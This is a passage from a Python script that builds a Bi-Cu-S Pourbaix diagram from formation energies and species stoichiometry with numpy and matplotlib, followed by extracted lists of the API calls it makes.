dGf_Cu2SO4_3=dGf_Cu2SO4_3*F;
dGf_BiCu=dGf_BiCu*F;
dGf_CuBiO2_2=dGf_CuBiO2_2*F;
dGf_BiS2=dGf_BiS2*F;
dGf_Bi2S3=dGf_Bi2S3*F;
dGf_Bi2S2O=dGf_Bi2S2O*F;
dGf_Bi2SO4_3=dGf_Bi2SO4_3*F;
dGf_Bi14OS24=dGf_Bi14OS24*F;
dGf_Bi2SO2=dGf_Bi2SO2*F;
dGf_BiSCuO=dGf_BiSCuO*F;
dGf_Cu3BiS3=dGf_Cu3BiS3*F;
dGf_Cu4Bi4S9=dGf_Cu4Bi4S9*F;
dGf_Cu4BiS2_5=dGf_Cu4BiS2_5*F;
dGf_CuBiS2=dGf_CuBiS2*F;
dGf_H2O= dGf_H2O*F;
###############################################################################
###############################################################################
###############################################################################
###############################################################################
############### Populate the species matrix ################################
###############################################################################
species=np.zeros((65,8))
######## Formation Energies ###################################################
species[0,0]=0.00;
species[1,0]=dGf_CuO
species[2,0]=dGf_Cu2O
species[3,0]=dGf_Cu1
species[4,0]=dGf_Cu2
species[5,0]=dGf_CuOH4_2
species[6,0]=dGf_CuOH2_minus
species[7,0]=dGf_CuOH3
species[8,0]=dGf_CuOH_Plus
species[9,0]=dGf_CuOH2
species[10,0]=dGf_CuOH
species[11,0]=dGf_Cu2OH2_2plus
species[12,0]=dGf_Cu3OH4_2plus
species[13,0]=dGf_Bi
species[14,0]=dGf_Bi2O3
species[15,0]=dGf_Bi2O5
species[16,0]=dGf_Bi2O4
species[17,0]=dGf_Bi4O7
species[18,0]=dGf_Bi_3Plus
species[19,0]=dGf_BiOH_2Plus
species[20,0]=dGf_BiO_Plus
species[21,0]=dGf_S
species[22,0]=dGf_H2S
species[23,0]=dGf_HS_Minus
species[24,0]=dGf_S_2Minus
species[25,0]=dGf_S2_2Minus
species[26,0]=dGf_S3_2Minus
species[27,0]=dGf_S4_2Minus
species[28,0]=dGf_S5_2Minus
species[29,0]=dGf_H2S2O3
species[30,0]=dGf_HS2O3_Minus
species[31,0]=dGf_S2O3_2Minus
species[32,0]=dGf_S5O6_2Minus
species[33,0]=dGf_S4O6_2Minus
species[34,0]=dGf_HS2O4_Minus
species[35,0]=dGf_S2O4_2Minus
species[36,0]=dGf_S3O6_2Minus
species[37,0]=dGf_H2SO3
species[38,0]=dGf_HSO3_Minus
species[39,0]=dGf_SO3_2Minus
species[40,0]=dGf_S2O6_2Minus
species[41,0]=dGf_H2SO4
species[42,0]=dGf_HSO4_Minus
species[43,0]=dGf_SO4_2Minus
species[44,0]=dGf_S2O8_2Minus
species[45,0]=dGf_HSO5_Minus
species[46,0]=dGf_S2O5_2Minus
species[47,0]=dGf_Cu2S
species[48,0]=dGf_Cu7S4
species[49,0]=dGf_CuS
species[50,0]=dGf_CuS2
species[51,0]=dGf_Cu2SO4_3
species[52,0]=dGf_BiCu
species[53,0]=dGf_CuBiO2_2
species[54,0]=dGf_BiS2
species[55,0]=dGf_Bi2S3
species[56,0]=dGf_Bi2S2O
species[57,0]=dGf_Bi2SO4_3
species[58,0]=dGf_Bi14OS24
species[59,0]=dGf_Bi2SO2
species[60,0]=dGf_CuBiS2
species[61,0]=dGf_Cu4Bi4S9
species[62,0]=dGf_Cu4BiS2_5
species[63,0]=dGf_BiSCuO
species[64,0]=dGf_Cu3BiS3
######## Electron Count #######################################################
#Cu
species[0,1]=0.00;
species[1,1]=2
species[2,1]=2
species[3,1]=1
species[4,1]=2
species[5,1]=2
species[6,1]=1
species[7,1]=2
species[8,1]=2
species[9,1]=2
species[10,1]=1
species[11,1]=4
species[12,1]=6
#Bi
species[13,1]=0
species[14,1]=6
species[15,1]=10
species[16,1]=8
species[17,1]=14
species[18,1]=3
species[19,1]=3
species[20,1]=3
#S
species[21,1]=0
species[22,1]=-2
species[23,1]=-2
species[24,1]=-2
species[25,1]=-2
species[26,1]=-2
species[27,1]=-2
species[28,1]=-2
species[29,1]=4
species[30,1]=4
species[31,1]=4
species[32,1]=10
species[33,1]=10
species[34,1]=6
species[35,1]=6
species[36,1]=10
species[37,1]=4
species[38,1]=4
species[39,1]=4
species[40,1]=10
species[41,1]=6
species[42,1]=6
species[43,1]=6
species[44,1]=14
species[45,1]=8
species[46,1]=8
#CuSOBi
species[47,1]=0
species[48,1]=0
species[49,1]=0
species[50,1]=0
species[51,1]=24
species[52,1]=0
species[53,1]=8
#BiSO
species[54,1]=0
species[55,1]=0
species[56,1]=2
species[57,1]=24
species[58,1]=2
species[59,1]=4
#CuBiS
species[60,1]=0
species[61,1]=0
species[62,1]=0
#BiCuSO
species[63,1]=2
species[64,1]=0
######## Hydrogen H+ Count ####################################################
#Cu
species[0,2]=0
species[1,2]=2
species[2,2]=2
species[3,2]=0
species[4,2]=0
species[5,2]=4
species[6,2]=2
species[7,2]=3
species[8,2]=1
species[9,2]=2
species[10,2]=1
species[11,2]=2
species[12,2]=4
#Bi
species[13,2]=0
species[14,2]=6
species[15,2]=10
species[16,2]=8
species[17,2]=14
species[18,2]=0
species[19,2]=1
species[20,2]=2
#S
species[21,2]=0
species[22,2]=-2
species[23,2]=-1
species[24,2]=0
species[25,2]=0
species[26,2]=0
species[27,2]=0
species[28,2]=0
species[29,2]=6
species[30,2]=5
species[31,2]=4
species[32,2]=12
species[33,2]=12
species[34,2]=6
species[35,2]=8
species[36,2]=12
species[37,2]=4
species[38,2]=5
species[39,2]=6
species[40,2]=12
species[41,2]=6
species[42,2]=7
species[43,2]=8
species[44,2]=16
species[45,2]=9
species[46,2]=10
#CuSBiO
species[47,2]=0
species[48,2]=0
species[49,2]=0
species[50,2]=0
species[51,2]=24
species[52,2]=0
species[53,2]=8
#BiSO
species[54,2]=0
species[55,2]=0
species[56,2]=2
species[57,2]=24
species[58,2]=2
species[59,2]=4
#BiCuS
species[60,2]=0
species[61,2]=0
species[62,2]=0
#BiCuSO
species[63,2]=2
species[64,2]=0
########### Number of Coppers Cu ##############################################
#Cu
species[0,3]=1
species[1,3]=1
species[2,3]=2
species[3,3]=1
species[4,3]=1
species[5,3]=1
species[6,3]=1
species[7,3]=1
species[8,3]=1
species[9,3]=1
species[10,3]=1
species[11,3]=2
species[12,3]=3
#Bismuth and Sulphur
species[13,3]=0
species[14,3]=0
species[15,3]=0
species[16,3]=0
species[17,3]=0
species[18,3]=0
species[19,3]=0
species[20,3]=0
species[21,3]=0
species[22,3]=0
species[23,3]=0
species[24,3]=0
species[25,3]=0
species[26,3]=0
species[27,3]=0
species[28,3]=0
species[29,3]=0
species[30,3]=0
species[31,3]=0
species[32,3]=0
species[33,3]=0
species[34,3]=0
species[35,3]=0
species[36,3]=0
species[37,3]=0
species[38,3]=0
species[39,3]=0
species[40,3]=0
species[41,3]=0
species[42,3]=0
species[43,3]=0
species[44,3]=0
species[45,3]=0
species[46,3]=0
#CuBiSO
species[47,3]=2
species[48,3]=7
species[49,3]=1
species[50,3]=1
species[51,3]=2
species[52,3]=1
species[53,3]=1
#BiSO
species[54,3]=0
species[55,3]=0
species[56,3]=0
species[57,3]=0
species[58,3]=0
species[59,3]=0
#CuBiS
species[60,3]=1
species[61,3]=4
species[62,3]=4
#BiCuSO
species[63,3]=1
species[64,3]=3
########### Number of Bismuths Bi #############################################
#Copper
species[0,4]=0
species[1,4]=0
species[2,4]=0
species[3,4]=0
species[4,4]=0
species[5,4]=0
species[6,4]=0
species[7,4]=0
species[8,4]=0
species[9,4]=0
species[10,4]=0
species[11,4]=0
species[12,4]=0
#Bismuth
species[13,4]=1
species[14,4]=2
species[15,4]=2
species[16,4]=2
species[17,4]=4
species[18,4]=1
species[19,4]=1
species[20,4]=1
#Sulphur
species[21,4]=0
species[22,4]=0
species[23,4]=0
species[24,4]=0
species[25,4]=0
species[26,4]=0
species[27,4]=0
species[28,4]=0
species[29,4]=0
species[30,4]=0
species[31,4]=0
species[32,4]=0
species[33,4]=0
species[34,4]=0
species[35,4]=0
species[36,4]=0
species[37,4]=0
species[38,4]=0
species[39,4]=0
species[40,4]=0
species[41,4]=0
species[42,4]=0
species[43,4]=0
species[44,4]=0
species[45,4]=0
species[46,4]=0
#CuSBiO
species[47,4]=0
species[48,4]=0
species[49,4]=0
species[50,4]=0
species[51,4]=0
species[52,4]=1
species[53,4]=2
#BiSO
species[54,4]=1
species[55,4]=2
species[56,4]=2
species[57,4]=2
species[58,4]=14
species[59,4]=2
#CuBiS
species[60,4]=1
species[61,4]=4
species[62,4]=5
#BiCuSO
species[63,4]=1
species[64,4]=1
########### Number of Sulphurs S #############################################
#Coppers
species[0,5]=0
species[1,5]=0
species[2,5]=0
species[3,5]=0
species[4,5]=0
species[5,5]=0
species[6,5]=0
species[7,5]=0
species[8,5]=0
species[9,5]=0
species[10,5]=0
species[11,5]=0
species[12,5]=0
#Bismuth
species[13,5]=0
species[14,5]=0
species[15,5]=0
species[16,5]=0
species[17,5]=0
species[18,5]=0
species[19,5]=0
species[20,5]=0
#Sulphur
species[21,5]=1
species[22,5]=1
species[23,5]=1
species[24,5]=1
species[25,5]=2
species[26,5]=3
species[27,5]=4
species[28,5]=5
species[29,5]=2
species[30,5]=2
species[31,5]=2
species[32,5]=5
species[33,5]=4
species[34,5]=2
species[35,5]=2
species[36,5]=3
species[37,5]=1
species[38,5]=1
species[39,5]=1
species[40,5]=2
species[41,5]=1
species[42,5]=1
species[43,5]=1
species[44,5]=2
species[45,5]=1
species[46,5]=2
#CuSBiO
species[47,5]=1
species[48,5]=4
species[49,5]=1
species[50,5]=2
species[51,5]=3
species[52,5]=0
species[53,5]=0
#BiSO
species[54,5]=2
species[55,5]=3
species[56,5]=2
species[57,5]=3
species[58,5]=24
species[59,5]=1
#CuBiS
species[60,5]=2
species[61,5]=9
species[62,5]=10
#BiCuSO
species[63,5]=1
species[64,5]=3
######### Number of H2O's #####################################################
#Copper
species[0,6]=0
species[1,6]=1
species[2,6]=1
species[3,6]=0
species[4,6]=0
species[5,6]=4
species[6,6]=2
species[7,6]=3
species[8,6]=1
species[9,6]=2
species[10,6]=1
species[11,6]=2
species[12,6]=4
#Bi
species[13,6]=0
species[14,6]=3
species[15,6]=5
species[16,6]=4
species[17,6]=7
species[18,6]=0
species[19,6]=1
species[20,6]=1
#Sulphur
species[21,6]=0
species[22,6]=0
species[23,6]=0
species[24,6]=0
species[25,6]=0
species[26,6]=0
species[27,6]=0
species[28,6]=0
species[29,6]=3
species[30,6]=3
species[31,6]=3
species[32,6]=6
species[33,6]=6
species[34,6]=4
species[35,6]=4
species[36,6]=6
species[37,6]=3
species[38,6]=3
species[39,6]=3
species[40,6]=6
species[41,6]=4
species[42,6]=4
species[43,6]=4
species[44,6]=8
species[45,6]=5
species[46,6]=5
#CuSBiO
species[47,6]=0
species[48,6]=0
species[49,6]=0
species[50,6]=0
species[51,6]=12
species[52,6]=0
species[53,6]=4
#BiSO
species[54,6]=0
species[55,6]=0
species[56,6]=1
species[57,6]=12
species[58,6]=1
species[59,6]=2
#CuBiS
species[60,6]=0
species[61,6]=0
species[62,6]=0
#BiCuSO
species[63,6]=1
species[64,6]=0
########## Aqueous Ions?????? #################################################
#Copper
species[0,7]=0
species[1,7]=0
species[2,7]=0
species[3,7]=1
species[4,7]=1
species[5,7]=1
species[6,7]=1
species[7,7]=1
species[8,7]=1
species[9,7]=1
species[10,7]=1
species[11,7]=1
species[12,7]=1
#Bismuth
species[13,7]=0
species[14,7]=0
species[15,7]=0
species[16,7]=0
species[17,7]=0
species[18,7]=1
species[19,7]=1
species[20,7]=1
#Sulphur
species[21,7]=0
species[22,7]=1
species[23,7]=1
species[24,7]=1
species[25,7]=1
species[26,7]=1
species[27,7]=1
species[28,7]=1
species[29,7]=1
species[30,7]=1
species[31,7]=1
species[32,7]=1
species[33,7]=1
species[34,7]=1
species[35,7]=1
species[36,7]=1
species[37,7]=1
species[38,7]=1
species[39,7]=1
species[40,7]=1
species[41,7]=1
species[42,7]=1
species[43,7]=1
species[44,7]=1
species[45,7]=1
species[46,7]=1
#CuSBiO
species[47,7]=0
species[48,7]=0
species[49,7]=0
species[50,7]=0
species[51,7]=0
species[52,7]=0
species[53,7]=0
#BiSO
species[54,7]=0
species[55,7]=0
species[56,7]=0
species[57,7]=0
species[58,7]=0
species[59,7]=0
#CuBiS
species[60,7]=0
species[61,7]=0
species[62,7]=0
#BiCuSO
species[63,7]=0
species[64,7]=0
#Function to determine species combinations
try:
combos=load('BiCuOS-speciesCombo.npy')
num=load('BiCuOS-numberSpecies.npy')
combo_num=int(num[0])
except OSError:
print('Cannot Open File')
###############################################################################
#### Determine which species are able to combine at the composition ###########
###############################################################################
t=1
flag=1
f_total=int;
f=np.zeros((3))
combos=np.zeros((45000,9,3))
combo_num=0
combos[combo_num, 0, 0]=-1
combos[combo_num, 0, 1]=-1
combos[combo_num, 0, 2]=-1
for k in range(0, len(species)):
for m in range(0, len(species)):
for p in range(0, len(species)):
#Check to make sure each element is in this combination of species
if((species[k, 3]>0 or species[m, 3] >0 or species[p, 3]) \
and (species[k, 4]>0 or species[m, 4] >0 or species[p, 4]) \
and (species[k, 5]>0 or species[m, 5] >0 or species[p, 5])):
#save species in array
t=1
a = np.array([[species[k, 3],species[m, 3], species[p,3]], \
[species[k, 4],species[m, 4], species[p,4]], \
[species[k, 5],species[m, 5], species[p,5]]])
#check to see if each species contains a single element. This is a really long call.
flag=1
if((species[k, 3]==0 and species[m, 3] ==0) or \
(species[m, 3]==0 and species[p, 3] ==0) or \
(species[k, 3]==0 and species[p, 3] ==0)):
if((species[k, 4]==0 and species[m, 4] ==0) or \
(species[m, 4]==0 and species[p, 4] ==0) or \
(species[k, 4]==0 and species[p, 4] ==0)):
if((species[k, 5]==0 and species[m, 5] ==0) or \
(species[m, 5]==0 and species[p, 5] ==0) or \
(species[k, 5]==0 and species[p, 5] ==0)):
flag=0
#if so, find the composition though linear algebra.
try:
f=np.linalg.solve(a, composition)
except:
#print('Error: Species '+str(k)+', Species2: '+str(m)+', Species3: '+str(p)+'\n')
t=1
t=0
#If there is at least one multi-element species in this combination
if(flag==1):
#test each linear combination
for h in range(1, 20):
for i in range(1, 20):
for j in range(1, 20):
#Is there a linear combination of the elements that will allow
#For the
if(((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[1,0]+i*a[1,1]+j*a[1,2]))==composition[0]/composition[1] and \
((h*a[1,0]+i*a[1,1]+j*a[1,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[1]/composition[2] and \
((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[0]/composition[2]):
#save the composition
f[0]=h
f[1]=i
f[2]=j
#Ending parameters, break loops
t=0;
h=40;
i=40;
j=40;
#If there is a linear combination, save the species in the combos array.
if (t==0):
#print(str(combo_num)+': Species1: '+str(k)+', Species2: '+str(m)+'\n')
#Species Number
combos[combo_num, 0, 0]=k
combos[combo_num, 0, 1]=m
combos[combo_num, 0, 2]=p
#Energy
combos[combo_num, 1, 0]=species[k,0]
combos[combo_num, 1, 1]=species[m,0]
combos[combo_num, 1, 2]=species[p,0]
#Electrons
combos[combo_num, 2, 0]=species[k,1]
combos[combo_num, 2, 1]=species[m,1]
combos[combo_num, 2, 2]=species[p,1]
#H+
combos[combo_num, 3, 0]=species[k,2]
combos[combo_num, 3, 1]=species[m,2]
combos[combo_num, 3, 2]=species[p,2]
#Number Silvers
combos[combo_num, 4, 0]=species[k,3]
combos[combo_num, 4, 1]=species[m,3]
combos[combo_num, 4, 2]=species[p,3]
#Number Bismuth
combos[combo_num, 5, 0]=species[k,4]
combos[combo_num, 5, 1]=species[m,4]
combos[combo_num, 5, 2]=species[p,4]
#Number H2O
combos[combo_num, 6, 0]=species[k,5]
combos[combo_num, 6, 1]=species[m,5]
combos[combo_num, 6, 2]=species[p,5]
#Aqueous Ions
combos[combo_num, 7, 0]=species[k,6]
combos[combo_num, 7, 1]=species[m,6]
combos[combo_num, 7, 2]=species[p,6]
#Percent of each in species in final combo
f_total=f[0]+f[1]+f[2];
combos[combo_num, 8, 0]=f[0]/f_total
combos[combo_num, 8, 1]=f[1]/f_total
combos[combo_num, 8, 2]=f[2]/f_total
combo_num=combo_num+1;
t=1
#print('entered')
else:
#Catch and switch the value of t back to no
t=1
save('BiCuOS-speciesCombo.npy', combos)
save('BiCuOS-numberSpecies.npy', asarray([[combo_num]]))
print('The number of species combinations is '+ str(combo_num)+'.\n')
###############################################################################
###############################################################################
###############################################################################
###############################################################################
########### Chemical Potential Mesh Calculations ############################
###############################################################################
#should be as long as there are specicies considered
#populate with smaller values that will be calculated.
muValues=np.zeros((n+1,n+1,4))
current_mu=int
current_ele=int
current_H=int
current_H2O=int
current_aquI=int
current_NumEle=int
sort=np.zeros((3,1))
#fill in the grid. Calculate
for i in range(0, n+1):
#calculate the energies for each species number
pH=lowpH+(i*pHcount);
for j in range(0,n+1):
U=Ulow+(j*Ucount);
muValues[i,j,0]=-1
muValues[i,j,1]=-1
muValues[i,j,2]=-1
muValues[i,j,3]=100000000
#Go through all species, commpare all pairs
for k in range(0, combo_num):
p=int(combos[k,0,0]);
m=int(combos[k,0,1]);
s=int(combos[k,0,2]);
f1=combos[k,8,0];
f2=combos[k,8,1];
f3=combos[k,8,2];
#The first species's contribution to the mu
current_eng=species[p,0]
current_ele=F*U*(species[p,1])
current_H=R*T*np.log(10.0)*pH*(species[p,2])
current_H2O=dGf_H2O*(species[p,6])
current_aquI=R*T*np.log(nI)*(species[p,7])
current_NumEle=1
for t in range(3,6):
if(species[p,t]>1):
current_NumEle=current_NumEle*species[p,t];
current_mu=f1*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle);
#The second species' contribution to the mu
current_eng=species[m,0];
current_ele=F*U*(species[m,1])
current_H=R*T*np.log(10.0)*pH*(species[m,2])
current_H2O=dGf_H2O*(species[m,6])
current_aquI=R*T*np.log(nI)*(species[m,7])
current_NumEle=1
for t in range(3,6):
if(species[m,t]>1):
current_NumEle=current_NumEle*species[m,t];
current_mu=current_mu+f2*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle);
#The second species' contribution to the mu
current_eng=species[s,0];
current_ele=F*U*(species[s,1])
current_H=R*T*np.log(10.0)*pH*(species[s,2])
current_H2O=dGf_H2O*(species[s,6])
current_aquI=R*T*np.log(nI)*(species[s,7])
current_NumEle=1
for t in range(3,6):
if(species[s,t]>1):
current_NumEle=current_NumEle*species[s,t];
current_mu=current_mu+f3*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle);
if(current_mu<muValues[i,j,3]):
sort[0,0]=p
sort[1,0]=m
sort[2,0]=s
a=np.sort(sort[:,0])
muValues[i,j,0]=a[0]
muValues[i,j,1]=a[1]
muValues[i,j,2]=a[2]
muValues[i,j,3]=current_mu
###############################################################################
###############################################################################
###############################################################################
###############################################################################
################### Plot Pourbaix Diagram ###################################
###############################################################################
flag = np.zeros((50,6)) # The first 4 indexes are the materials stored, the next three are the colors
index=0;
fig =plt.figure()
ax=plt.subplot(111)
ax = plt.gca()
ax.set_xlim([lowpH,highpH])
ax.set_ylim([Ulow,Uhigh])
l=0;
index=0;
for i in range(0, n+1):
pH=lowpH+i*pHcount;
for j in range(0,n+1):
U=Ulow+(Ucount*j);
l=0
for k in range(0, len(flag)):
if(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,1] and flag[k,2]==muValues[i,j,2]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,1]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,0]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,2]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,1]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,1]and flag[k,2]==muValues[i,j,0]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
if(l==0):
label='M1: '+str(muValues[i,j,0])+', M2: '+str(muValues[i,j,1])+' M3: '+str(muValues[i,j,2])
flag[index,0] = muValues[i,j,0]
flag[index,1] = muValues[i,j,1]
flag[index,2] = muValues[i,j,2]
flag[index,3] = random.random();
flag[index,4] = random.random();
flag[index,5] = random.random();
ax.plot(pH,U,'.', color = [flag[index,3],flag[index,4],flag[index,5]],markersize=4,label=label)
index=index+1;
#####Plot H2O and H2 lines##################################
muH=np.zeros((pHrange+1));
muH2O=np.zeros((pHrange+1));
pHArray=np.zeros((pHrange+1));
for i in range(0, pHrange):
pHArray[i] =lowpH+i;
muH[i]=-0.059*pHArray[i];
muH2O[i]=1.23-0.059*pHArray[i];
pHArray[pHrange] =lowpH+(pHrange);
muH[pHrange]=-0.059*pHArray[pHrange];
muH2O[pHrange]=1.23-0.059*pHArray[pHrange];
##############################################################
ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1)
ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1)
ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1)
plt.ylabel('Electric Potential, E(V)')
plt.xlabel('pH')
plt.title('Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S')
###############################################################################
############## Plot with Lines ############################################
###############################################################################
flag = np.zeros((50,6)) # The first 4 indexes are the materials stored, the next three are the colors
index=0;
fig =plt.figure()
ax=plt.subplot(111)
ax = plt.gca()
ax.set_xlim([lowpH,highpH])
ax.set_ylim([Ulow,Uhigh])
#If drawing lines for metastable phases
for i in range(1, n):
#calculate the energies for each species number
pH=lowpH+(i*pHcount);
for j in range(1,n):
U=Ulow+(j*Ucount);
#If drawing lines for metastable phases
if((muValues[i,j,0]!=muValues[i-1,j,0])):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
elif(muValues[i,j,1]!=muValues[i-1,j,1]):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
elif((muValues[i,j,0]!=muValues[i,j-1,0]) or (muValues[i,j,1]!=muValues[i,j-1,1])):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
elif((muValues[i,j,2]!=muValues[i,j-1,2]) or (muValues[i,j,2]!=muValues[i-1,j,2])):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1)
ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1)
plt.ylabel('Electric Potential, E(V)')
plt.xlabel('pH')
plt.title('Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S')
chartBox=ax.get_position()
ax.set_position([chartBox.x0, chartBox.y0, chartBox.width*1.5, chartBox.height*1.5])
ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1)
plt.show()
print('End of Script')
|
[
"matplotlib.pyplot.subplot",
"numpy.load",
"numpy.save",
"matplotlib.pyplot.show",
"numpy.log",
"numpy.asarray",
"numpy.zeros",
"random.random",
"matplotlib.pyplot.figure",
"numpy.sort",
"numpy.array",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"numpy.linalg.solve"
] |
[((734, 753), 'numpy.array', 'np.array', (['[1, 1, 1]'], {}), '([1, 1, 1])\n', (742, 753), True, 'import numpy as np\n'), ((10420, 10437), 'numpy.zeros', 'np.zeros', (['(65, 8)'], {}), '((65, 8))\n', (10428, 10437), True, 'import numpy as np\n'), ((27784, 27811), 'numpy.zeros', 'np.zeros', (['(n + 1, n + 1, 4)'], {}), '((n + 1, n + 1, 4))\n', (27792, 27811), True, 'import numpy as np\n'), ((27908, 27924), 'numpy.zeros', 'np.zeros', (['(3, 1)'], {}), '((3, 1))\n', (27916, 27924), True, 'import numpy as np\n'), ((31114, 31131), 'numpy.zeros', 'np.zeros', (['(50, 6)'], {}), '((50, 6))\n', (31122, 31131), True, 'import numpy as np\n'), ((31223, 31235), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (31233, 31235), True, 'import matplotlib.pyplot as plt\n'), ((31239, 31255), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (31250, 31255), True, 'import matplotlib.pyplot as plt\n'), ((31261, 31270), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (31268, 31270), True, 'import matplotlib.pyplot as plt\n'), ((33846, 33867), 'numpy.zeros', 'np.zeros', (['(pHrange + 1)'], {}), '(pHrange + 1)\n', (33854, 33867), True, 'import numpy as np\n'), ((33875, 33896), 'numpy.zeros', 'np.zeros', (['(pHrange + 1)'], {}), '(pHrange + 1)\n', (33883, 33896), True, 'import numpy as np\n'), ((33906, 33927), 'numpy.zeros', 'np.zeros', (['(pHrange + 1)'], {}), '(pHrange + 1)\n', (33914, 33927), True, 'import numpy as np\n'), ((34443, 34481), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Electric Potential, E(V)"""'], {}), "('Electric Potential, E(V)')\n", (34453, 34481), True, 'import matplotlib.pyplot as plt\n'), ((34482, 34498), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""pH"""'], {}), "('pH')\n", (34492, 34498), True, 'import matplotlib.pyplot as plt\n'), ((34902, 34919), 'numpy.zeros', 'np.zeros', (['(50, 6)'], {}), '((50, 6))\n', (34910, 34919), True, 'import numpy as np\n'), ((35011, 35023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (35021, 35023), True, 'import matplotlib.pyplot as plt\n'), ((35027, 35043), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (35038, 35043), True, 'import matplotlib.pyplot as plt\n'), ((35049, 35058), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (35056, 35058), True, 'import matplotlib.pyplot as plt\n'), ((36055, 36093), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Electric Potential, E(V)"""'], {}), "('Electric Potential, E(V)')\n", (36065, 36093), True, 'import matplotlib.pyplot as plt\n'), ((36094, 36110), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""pH"""'], {}), "('pH')\n", (36104, 36110), True, 'import matplotlib.pyplot as plt\n'), ((36442, 36452), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (36450, 36452), True, 'import matplotlib.pyplot as plt\n'), ((20454, 20485), 'numpy.load', 'load', (['"""BiCuOS-speciesCombo.npy"""'], {}), "('BiCuOS-speciesCombo.npy')\n", (20458, 20485), False, 'from numpy import load\n'), ((20494, 20526), 'numpy.load', 'load', (['"""BiCuOS-numberSpecies.npy"""'], {}), "('BiCuOS-numberSpecies.npy')\n", (20498, 20526), False, 'from numpy import load\n'), ((20893, 20904), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (20901, 20904), True, 'import numpy as np\n'), ((20918, 20941), 'numpy.zeros', 'np.zeros', (['(45000, 9, 3)'], {}), '((45000, 9, 3))\n', (20926, 20941), True, 'import numpy as np\n'), ((27010, 27049), 'numpy.save', 'save', (['"""BiCuOS-speciesCombo.npy"""', 'combos'], {}), "('BiCuOS-speciesCombo.npy', combos)\n", (27014, 27049), False, 'from numpy import save\n'), ((27087, 27109), 'numpy.asarray', 'asarray', (['[[combo_num]]'], {}), '([[combo_num]])\n', (27094, 27109), False, 'from numpy import asarray\n'), ((33537, 33552), 'random.random', 'random.random', ([], {}), '()\n', (33550, 33552), False, 'import random\n'), ((33582, 33597), 'random.random', 'random.random', ([], {}), '()\n', (33595, 33597), False, 'import random\n'), ((33627, 33642), 'random.random', 'random.random', ([], {}), '()\n', (33640, 33642), False, 'import random\n'), ((30404, 30423), 'numpy.sort', 'np.sort', (['sort[:, 0]'], {}), '(sort[:, 0])\n', (30411, 30423), True, 'import numpy as np\n'), ((28790, 28800), 'numpy.log', 'np.log', (['nI'], {}), '(nI)\n', (28796, 28800), True, 'import numpy as np\n'), ((29367, 29377), 'numpy.log', 'np.log', (['nI'], {}), '(nI)\n', (29373, 29377), True, 'import numpy as np\n'), ((29954, 29964), 'numpy.log', 'np.log', (['nI'], {}), '(nI)\n', (29960, 29964), True, 'import numpy as np\n'), ((21582, 21741), 'numpy.array', 'np.array', (['[[species[k, 3], species[m, 3], species[p, 3]], [species[k, 4], species[m, \n 4], species[p, 4]], [species[k, 5], species[m, 5], species[p, 5]]]'], {}), '([[species[k, 3], species[m, 3], species[p, 3]], [species[k, 4],\n species[m, 4], species[p, 4]], [species[k, 5], species[m, 5], species[p,\n 5]]])\n', 